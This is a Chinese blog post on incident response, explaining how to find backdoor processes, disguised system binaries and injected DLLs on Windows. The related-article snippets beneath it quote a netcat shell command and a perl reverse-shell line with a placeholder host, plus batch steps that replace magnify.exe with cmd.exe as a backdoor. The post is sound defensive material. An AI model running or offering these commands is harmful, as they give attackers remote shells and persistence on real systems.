系统后门应急排查方法

已于 2025-03-13 15:17:47 修改
阅读量383 收藏 4
点赞数 3
分类专栏: 思路 文章标签: linux 服务器 网络 网络安全
于 2025-03-13 15:13:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wuwenshequ/article/details/146231606
版权

无问社区-官网:http://www.wwlib.cn

本期无人投稿,欢迎大家投稿,投稿可获得无问社区AI大模型的使用红包哦!

无问社区:网安文章沉浸式免费看!

无问AI大模型不懂的问题随意问!

全网网安资源智能搜索只等你来!

01后门进程排查

    首先需要确定后门运行时的行为,处置目标多数都是以获取目标样本,排查入侵来源,在排查中最高效直接的自然就是用杀软杀毒,如果当前杀软杀不出来,那就多换几个,当然,勒索病毒除外。

    首先需要通过排查端口连接以及进程去确定病毒文件位置

图片

图片

图片

    

    一般来讲,通过上述三种方式都能确定到后门进程/文件。到这一步一般分为两种结果

    1、已经确定异常进程并找到了病毒文件

    2、发现进程名是正常进程

    第一种情况就不多说了,已经取得成功了。那么第二种就稍微有点棘手。

    这时需要考虑两种情况

    1、正常文件被感染

    直接对文件进行查杀验证,需要注意的是,有些后门文件会使用系统文件名,路径也极为相似,此时需要关注路径是否正确。

案例1:svchost.exe:

图片

案例2:taskmgr.exe

图片

02进程注入排查

    进程注入的特点

图片

图片

    通过命令行是无法找到真正的后门文件的

图片

    

这里提供两种方式进行排查

1、通过tasklist查看进程dll,这里要有心理准备,会出现上百个dll让你排查。

图片

2.通过processhack排查

找到创建外连进程的父进程

图片

图片

在父进程的modules中可以排查到恶意dll文件。

图片

网络安全从入门到精通(特别篇I):应急响应之不同平台后门排查思路
HACKONE的博客
05-26 193
Linux-后门-常规&权限维持&Rootkit&内存马。Rootkit后门:GScan rkhunter。Windows-后门-常规&权限维持&内存马。权限维持后门:GScan rkhunter。2、Rootkit后门-分析检测。3、Web程序内存马-分析检测。4、Web程序内存马-分析检测。1、常规MSF后门-分析检测。1、常规MSF后门-分析检测。2、权限维持后门-分析检测。3、权限维持后门-分析检测。Web层面:通用系统层面。2、内存马(无文件马)
应急响应】Windows应急响应手册(远控后门篇)
李火火的安全圈
07-19 1233
本篇文章以实战攻防过程中对于远程控制和恶意程序运行等利用手段做后续的应急排查工作,根据所能获取到的信息进一步跟踪动向进行排查处置。
进程注入bypass
moonlightsunshin的博客
03-17 646
Control Flow Guard(CFG)是一种微软引入的防护技术,最早在 Windows 8.1 中加入,并在 Windows 10 及后续版本中得到了加强。它的核心目标是防止程序中的恶意代码劫持控制流,从而实现对系统的恶意操作。在正常程序运行中,程序的控制流(即代码的执行顺序)会根据不同的条件跳转到不同的位置。攻击者通过注入恶意代码或者篡改程序控制流,能够导致程序执行恶意操作,如获取管理员权限、窃取数据等。
如何排查服务器中存在的后门程序
最新发布
2409_89014517的博客
04-27 536
如何排查服务器中存在的后门程序
Windows以及Linux的入侵排查
qq_60600840的博客
06-03 900
对于系统或者应用发生了安全事件之后的处理应急响应的处理分为事前和事后处理数据备份、风险评估、安全培训、应急演练等病毒检测、后门检测、系统恢复、清除病毒以及后门程序、调查与追踪、入侵者取证等。后门查杀
Linux后门排查
总有人间一两风,填我十万八千梦
07-12 8062
目录 文件排查 查看历史命令记录 特殊权限文件查找 进程排查 日志排查 入侵检测工具——GScan 文件排查 查看开机启动项,是否存在可疑启动项 systemctl list-unit-files |grep enabled 查看历史命令记录 history|more 或 more /root/.bash_history 当时,当我们执行上面那两条历史命令的时候就会发现,结果不一样,history的内容比history多。因为bash执行命令时不是马上把命令名称写入.bas
后门排查方法
XXokok的博客
12-01 469
排查后门时注意项有哪些
windows常见后门隐藏和权限维持方法排查技术
3569
04-24 7063
https://xz.aliyun.com/t/4842 这片文章中隐藏webshell我觉得很nice ... 进程注入以前试过 ... wmi 和 bitsadmin 可以了解下 ... 常见backdoor和persistence方式方法 系统工具替换后门 Image 劫持辅助工具管理器 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\...
应急响应-主机后门webshell的排查思路(webshell,启动项,隐藏账户,映像劫持,rootkit后门
告白的博客
08-04 2027
思路3:pchunter查看进程,大多数木马文件在没有做屏蔽等措施,在厂商归属,指纹信息会显示异常,或者无任何厂商归属信息,可以借助为参考。针对主机后门windows,linux,在对方植入webshell后,需要立即响应,排查后门位置,以及排查对外连接,端口使用情况等等。借助工具:pchunter 火绒剑 均可,不方便情况下cmd查看对外连接状态,进程状态,端口信息等。linux被rootkit上线:无法查看到对外连接,在受害机执行命令可以做到隐藏进程,文件等。映像劫持,隐藏账户,均可借助工具查看,
应急响应— 操作系统分析(病毒、后门
qi_SJQ_的博客
02-18 933
一、操作系统(windows,linux): 1.常见危害:暴力破解,漏洞利用,流量攻击,木马控制(Webshell,PC 木马等),病毒感染(挖矿,蠕虫,勒索等)。 暴力破解:针对系统有包括rdp、ssh、telnet等,针对服务有包括mysql、ftp等,一般可以通过超级弱口令工具、hydra进行爆破 漏洞利用:通过系统、服务的漏洞进行攻击,如永恒之蓝等 流量攻击:主要是对目标机器进行dos攻击,从而导致服务器瘫痪 木马控制:主要分为webshell和PC木马,webshell是存在于网站应用中的
应急响应篇】应急响应之进程,服务,文件排查方法
大河之犬的博客
05-10 919
有些恶意程序释放子体(即恶意程序运行时投放出的文件)一般会在程序中写好投放的路径,由于不同系统版本的路径有所差别,但是临时文件的路径相对统一,因此在程序中写好的路径一般是临时目录。对于 Windows 系统中的进程排查,主要是找到恶意进程的 PID、程序路径, 有时还需要找到 PPID(PID 的父进程)及程序加载的 DLL。】命令,可移除 i 属性,进而删除文件。打开【运行】对话框,输入【services.msc】命令,可打开【服务】窗口,查看所有的服务项,包括服务的名称、描述、状态等。
网络安全——应急响应之Windows入侵排查
CoffeMilk的博客
11-08 990
网络安全所说的应急响应(Emergency Response)通常是指在突发事件发生后,为了减少损失和危害,迅速采取的一系列应对措施,保护生命财产安全,恢复正常秩序的过程。这里说的突发事件特指:影响系统(包含服务器主机和操作系统网络范围)正常工作的情况(如:黑客入侵服务器、黑客劫持服务器、病毒爆发、系统异常宕机、应用服务瘫痪、信息窃取、DDOS攻击、网络流量异常等内容)
WINDOWS后门
weixin_44253823的博客
07-20 757
打开记事本,输入如下文本: cd c:\windows\system32 takeown /f magnify.exe icacls magnify.exe /grant administrators:F ren magnify_back.exe copy cmd.exe magnify.exe 写完后保存为back.bat,存在C盘test目录下。 接下来,打开“我的电脑”,进入C...
Linux常见系统后门排查命令
热门推荐
weixin_45253622的博客
03-03 1万+
Linux常见系统后门排查命令 1、检查异常账号——cat /etc/passwd 通过检查/etc/passwd,查看有没有可疑的系统用户,这个文件是以冒号:进行分割字段,一般我们只要注意第三个字段即可,第三个字段是用户ID,也就是UID,数字0代表超级用户的UID,即这个账号是管理员账号。一般Linux只会配置一个root账号为系统管理员,当出现其他账号是系统管理员的时候,就要注意了,很可能是黑客建立的账号。 2、检查异常登陆 who 查看当前登录用户(tty本地登陆 pts
服务器后门查找排查之情报分析
网站安全专家
09-06 298
威胁情报,顾名思义它是威胁的情报,这个情报的产出是什么,是人。在备注里因为我之前分析过了,所以它特别快,他有这么多的信息,那咱们在比如互网的时候最关注的什么,他的IP的信息,查到他的IP了,快速检索咱们的网络设备和安全设备,看有没有此IP发送的请求,或者从内部向他发送的请求,搜索一下这个IP地址是什么,那就不能用云砂箱,还在微博在线刚才的搜索栏,这里边是它的一些信誉度,也就和咱们的信用卡一样,你消费过度了,看他执行了CS的木马,被人标记了这时候咱们就百分百确定它是一个攻击IP,那马上将它封禁就可以了。
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
05-07 4127
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
应急响应之apache日志分析及web后门排查
总有人间一两风,填我十万八千梦
07-02 8263
目录 WEB日志 Apache日志 日志分析工具 webshell检测工具 应急响应中很重要的就是能够进行日志分析,所以需要我们能够看懂日志,根据日志信息去判断是否存在攻击行为,我们先看下常见的web服务器的日志文件位置。 WEB日志 Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析,不仅可以帮助我们定位攻击者,还可以帮助我们还原攻击路径,找到网站存在的安全漏洞并进行修复。 常见的服务搭建平台如下: Apache日志 日志文件路径
手工排查后门木马的常用姿势
C-HOWE的博客
03-31 708
● 重点关注:.php、.jsp、.asp、.sh 等可执行文件。 ● 隐藏文件:检查 /tmp/、/dev/shm/ 等临时目录。 ● 常见WebShell:shell.php、b374k.php、c99.php、wso.php。 ● 隐藏技巧:攻击者可能使用 …gif.php 伪装成图片。 ● 异常大文件:可能是攻击者存放的加密数据或恶意代码。 ● 常见后门进程: ● nc -lvp 4444 -e /bin/bash(反弹Shell) ● perl -e 'use Socket;i="x.x.x.x
应急响应篇:windows入侵排查
kali_Ma的博客
09-08 2049
前言 应急响应(Incident Response Service,IRS)是当企业系统遭受病毒传播、网络攻击、黑客入侵等安全事件导致信息业务中断、系统宕机、网络瘫痪,数据丢失、企业声誉受损,并对组织和业务运行产生直接或间接的负面影响时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,同时分析入侵原因、还原入侵过程、评估业务损失、溯源黑客取证并提出解决方案和防范措施,减少企业因黑客带来的相关损失。本文主要讨论windows被入侵后的排查思路。 windows入侵排查利器:火绒剑 202
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值